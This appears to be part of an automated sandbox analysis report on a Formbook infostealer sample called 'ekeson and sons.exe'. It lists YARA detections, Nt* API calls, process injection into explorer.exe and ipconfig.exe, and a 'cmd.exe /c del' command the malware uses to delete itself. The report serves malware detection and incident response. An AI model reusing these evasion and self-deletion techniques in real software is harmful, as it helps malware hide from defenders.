      Source: 00000001.00000002.430341616.0000000000A20000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000A.00000002.597291175.0000000000A90000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000A.00000002.597291175.0000000000A90000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000001.00000002.429851869.0000000000431000.00000020.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000001.00000002.429851869.0000000000431000.00000020.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AC98F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_00AC98F0
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AC9860 NtQuerySystemInformation,LdrInitializeThunk,1_2_00AC9860
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AC9840 NtDelayExecution,LdrInitializeThunk,1_2_00AC9840
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AC99A0 NtCreateSection,LdrInitializeThunk,1_2_00AC99A0
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_00AC9910
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AC9A20 NtResumeThread,LdrInitializeThunk,1_2_00AC9A20
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AC9A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_00AC9A00
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AC9A50 NtCreateFile,LdrInitializeThunk,1_2_00AC9A50
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AC95D0 NtClose,LdrInitializeThunk,1_2_00AC95D0
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AC9540 NtReadFile,LdrInitializeThunk,1_2_00AC9540
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AC96E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_00AC96E0
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AC9660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_00AC9660
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AC97A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_00AC97A0
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AC9780 NtMapViewOfSection,LdrInitializeThunk,1_2_00AC9780
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AC9FE0 NtCreateMutant,LdrInitializeThunk,1_2_00AC9FE0
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AC9710 NtQueryInformationToken,LdrInitializeThunk,1_2_00AC9710
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AC98A0 NtWriteVirtualMemory,1_2_00AC98A0
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AC9820 NtEnumerateKey,1_2_00AC9820
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00ACB040 NtSuspendThread,1_2_00ACB040
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AC99D0 NtCreateProcessEx,1_2_00AC99D0
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AC9950 NtQueueApcThread,1_2_00AC9950
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AC9A80 NtOpenDirectoryObject,1_2_00AC9A80
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AC9A10 NtQuerySection,1_2_00AC9A10
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00ACA3B0 NtGetContextThread,1_2_00ACA3B0
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AC9B00 NtSetValueKey,1_2_00AC9B00
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AC95F0 NtQueryInformationFile,1_2_00AC95F0
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AC9520 NtWaitForSingleObject,1_2_00AC9520
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00ACAD30 NtSetContextThread,1_2_00ACAD30
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AC9560 NtWriteFile,1_2_00AC9560
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AC96D0 NtCreateKey,1_2_00AC96D0
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AC9610 NtEnumerateValueKey,1_2_00AC9610
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AC9670 NtQueryInformationProcess,1_2_00AC9670
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AC9650 NtQueryValueKey,1_2_00AC9650
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AC9730 NtQueryVirtualMemory,1_2_00AC9730
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00ACA710 NtOpenProcessToken,1_2_00ACA710
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AC9760 NtOpenProcess,1_2_00AC9760
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00ACA770 NtOpenThread,1_2_00ACA770
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AC9770 NtSetInformationFile,1_2_00AC9770
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_004481C0 NtCreateFile,1_2_004481C0
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00448270 NtReadFile,1_2_00448270
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_004482F0 NtClose,1_2_004482F0
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_004483A0 NtAllocateVirtualMemory,1_2_004483A0
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_004481BA NtCreateFile,1_2_004481BA
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_0044826A NtReadFile,1_2_0044826A
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00448212 NtCreateFile,1_2_00448212
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_0044839C NtAllocateVirtualMemory,1_2_0044839C
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036E9A50 NtCreateFile,LdrInitializeThunk,10_2_036E9A50
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,10_2_036E9910
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036E99A0 NtCreateSection,LdrInitializeThunk,10_2_036E99A0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036E9860 NtQuerySystemInformation,LdrInitializeThunk,10_2_036E9860
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036E9840 NtDelayExecution,LdrInitializeThunk,10_2_036E9840
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036E9710 NtQueryInformationToken,LdrInitializeThunk,10_2_036E9710
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036E9FE0 NtCreateMutant,LdrInitializeThunk,10_2_036E9FE0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036E9780 NtMapViewOfSection,LdrInitializeThunk,10_2_036E9780
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036E96E0 NtFreeVirtualMemory,LdrInitializeThunk,10_2_036E96E0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036E96D0 NtCreateKey,LdrInitializeThunk,10_2_036E96D0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036E9540 NtReadFile,LdrInitializeThunk,10_2_036E9540
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036E95D0 NtClose,LdrInitializeThunk,10_2_036E95D0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036E9B00 NtSetValueKey,10_2_036E9B00
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036EA3B0 NtGetContextThread,10_2_036EA3B0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036E9A20 NtResumeThread,10_2_036E9A20
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036E9A00 NtProtectVirtualMemory,10_2_036E9A00
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036E9A10 NtQuerySection,10_2_036E9A10
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036E9A80 NtOpenDirectoryObject,10_2_036E9A80
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036E9950 NtQueueApcThread,10_2_036E9950
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036E99D0 NtCreateProcessEx,10_2_036E99D0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036EB040 NtSuspendThread,10_2_036EB040
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036E9820 NtEnumerateKey,10_2_036E9820
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036E98F0 NtReadVirtualMemory,10_2_036E98F0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036E98A0 NtWriteVirtualMemory,10_2_036E98A0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036E9760 NtOpenProcess,10_2_036E9760
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036EA770 NtOpenThread,10_2_036EA770
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036E9770 NtSetInformationFile,10_2_036E9770
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036E9730 NtQueryVirtualMemory,10_2_036E9730
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036EA710 NtOpenProcessToken,10_2_036EA710
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036E97A0 NtUnmapViewOfSection,10_2_036E97A0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036E9660 NtAllocateVirtualMemory,10_2_036E9660
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036E9670 NtQueryInformationProcess,10_2_036E9670
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036E9650 NtQueryValueKey,10_2_036E9650
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036E9610 NtEnumerateValueKey,10_2_036E9610
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036E9560 NtWriteFile,10_2_036E9560
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036E9520 NtWaitForSingleObject,10_2_036E9520
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036EAD30 NtSetContextThread,10_2_036EAD30
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036E95F0 NtQueryInformationFile,10_2_036E95F0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_02F782F0 NtClose,10_2_02F782F0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_02F78270 NtReadFile,10_2_02F78270
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_02F781C0 NtCreateFile,10_2_02F781C0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_02F7826A NtReadFile,10_2_02F7826A
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_02F78212 NtCreateFile,10_2_02F78212
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_02F781BA NtCreateFile,10_2_02F781BA
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_0040323C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,1_2_0040323C
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_004048531_2_00404853
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_004061311_2_00406131
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AB20A01_2_00AB20A0
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B520A81_2_00B520A8
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00A9B0901_2_00A9B090
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B528EC1_2_00B528EC
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B410021_2_00B41002
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AA41201_2_00AA4120
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00A8F9001_2_00A8F900
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B522AE1_2_00B522AE
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00ABEBB01_2_00ABEBB0
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B4DBD21_2_00B4DBD2
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B52B281_2_00B52B28
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00A9841F1_2_00A9841F
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B4D4661_2_00B4D466
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AB25811_2_00AB2581
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00A9D5E01_2_00A9D5E0
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B525DD1_2_00B525DD
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00A80D201_2_00A80D20
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B52D071_2_00B52D07
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B51D551_2_00B51D55
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B52EF71_2_00B52EF7
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00AA6E301_2_00AA6E30
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00B51FF11_2_00B51FF1
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_004310271_2_00431027
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_0044C0211_2_0044C021
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_004310301_2_00431030
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_0044BBFB1_2_0044BBFB
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00438C5B1_2_00438C5B
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00438C601_2_00438C60
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_0044C4CB1_2_0044C4CB
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_0044BDEA1_2_0044BDEA
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00432D901_2_00432D90
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_0044B6E61_2_0044B6E6
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00432FB01_2_00432FB0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_03772B2810_2_03772B28
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_0376DBD210_2_0376DBD2
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_037603DA10_2_037603DA
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036DEBB010_2_036DEBB0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_0375FA2B10_2_0375FA2B
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_037722AE10_2_037722AE
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036C412010_2_036C4120
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036AF90010_2_036AF900
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_0377E82410_2_0377E824
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_0376100210_2_03761002
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_037728EC10_2_037728EC
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036D20A010_2_036D20A0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_037720A810_2_037720A8
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036BB09010_2_036BB090
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_03771FF110_2_03771FF1
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_0377DFCE10_2_0377DFCE
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036C6E3010_2_036C6E30
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_0376D61610_2_0376D616
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_03772EF710_2_03772EF7
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_03771D5510_2_03771D55
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036A0D2010_2_036A0D20
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_03772D0710_2_03772D07
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036BD5E010_2_036BD5E0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_037725DD10_2_037725DD
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036D258110_2_036D2581
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_0376D46610_2_0376D466
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036B841F10_2_036B841F
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_02F7C02110_2_02F7C021
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_02F7B6E610_2_02F7B6E6
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_02F62FB010_2_02F62FB0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_02F7C4CB10_2_02F7C4CB
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_02F68C6010_2_02F68C60
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_02F68C5B10_2_02F68C5B
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_02F7BDE610_2_02F7BDE6
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_02F62D9010_2_02F62D90
      Source: C:\Users\user\Desktop\ekeson and sons.exeProcess token adjusted: SecurityJump to behavior
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: String function: 036AB150 appears 45 times
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: String function: 00A8B150 appears 35 times
      Source: ekeson and sons.exe, 00000000.00000003.353844872.0000000009B3F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ekeson and sons.exe
      Source: ekeson and sons.exe, 00000001.00000002.430865542.0000000000D0F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs ekeson and sons.exe
      Source: ekeson and sons.exe, 00000001.00000002.431461556.0000000002AC7000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs ekeson and sons.exe
      Source: ekeson and sons.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: 0000000A.00000002.597762565.0000000002F60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000A.00000002.597762565.0000000002F60000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000001.00000002.429964840.00000000004F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000001.00000002.429964840.00000000004F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000001.00000002.430341616.0000000000A20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000001.00000002.430341616.0000000000A20000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000A.00000002.597291175.0000000000A90000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000A.00000002.597291175.0000000000A90000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000001.00000002.429851869.0000000000431000.00000020.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000001.00000002.429851869.0000000000431000.00000020.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: classification engineClassification label: mal100.troj.evad.winEXE@7/4@10/6
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,1_2_00404356
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00402020 CoCreateInstance,MultiByteToWideChar,1_2_00402020
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6676:120:WilError_01
      Source: C:\Users\user\Desktop\ekeson and sons.exeFile created: C:\Users\user\AppData\Local\Temp\nsiD03E.tmpJump to behavior
      Source: ekeson and sons.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\ekeson and sons.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\ekeson and sons.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: ekeson and sons.exeVirustotal: Detection: 30%
      Source: ekeson and sons.exeReversingLabs: Detection: 51%
      Source: C:\Users\user\Desktop\ekeson and sons.exeFile read: C:\Users\user\Desktop\ekeson and sons.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\ekeson and sons.exe 'C:\Users\user\Desktop\ekeson and sons.exe'
      Source: C:\Users\user\Desktop\ekeson and sons.exeProcess created: C:\Users\user\Desktop\ekeson and sons.exe 'C:\Users\user\Desktop\ekeson and sons.exe'
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe C:\Windows\SysWOW64\ipconfig.exe
      Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ekeson and sons.exe'
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\ekeson and sons.exeProcess created: C:\Users\user\Desktop\ekeson and sons.exe 'C:\Users\user\Desktop\ekeson and sons.exe' Jump to behavior
      Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ekeson and sons.exe'Jump to behavior
      Source: C:\Users\user\Desktop\ekeson and sons.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
      Source: Binary string: ipconfig.pdb source: ekeson and sons.exe, 00000001.00000002.431438448.0000000002AC0000.00000040.00000001.sdmp
      Source: Binary string: ipconfig.pdbGCTL source: ekeson and sons.exe, 00000001.00000002.431438448.0000000002AC0000.00000040.00000001.sdmp
      Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.379665278.0000000007CA0000.00000002.00000001.sdmp
      Source: Binary string: wntdll.pdbUGP source: ekeson and sons.exe, 00000000.00000003.350189687.0000000009A20000.00000004.00000001.sdmp, ekeson and sons.exe, 00000001.00000002.430409442.0000000000A60000.00000040.00000001.sdmp, ipconfig.exe, 0000000A.00000002.598221792.000000000379F000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: ekeson and sons.exe, ipconfig.exe
      Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.379665278.0000000007CA0000.00000002.00000001.sdmp
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,1_2_00405E88
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00ADD0D1 push ecx; ret 1_2_00ADD0E4
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00445BCD push edi; retf 1_2_00445BE0
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_0044B3B5 push eax; ret 1_2_0044B408
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_0044B46C push eax; ret 1_2_0044B472
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_0044B402 push eax; ret 1_2_0044B408
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_0044B40B push eax; ret 1_2_0044B472
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00445C3B push EF9E65E4h; retf 1_2_00445C7E
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00431693 push ebp; ret 1_2_0043169A
      Source: C:\Users\user\Desktop\ekeson and sons.exeCode function: 1_2_00449F89 push ecx; ret 1_2_00449F8A
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_036FD0D1 push ecx; ret 10_2_036FD0E4
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_02F75BCD push edi; retf 10_2_02F75BE0
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_02F7B3B5 push eax; ret 10_2_02F7B408
      Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 10_2_02F61693 push ebp; ret 10_2_02F6169A
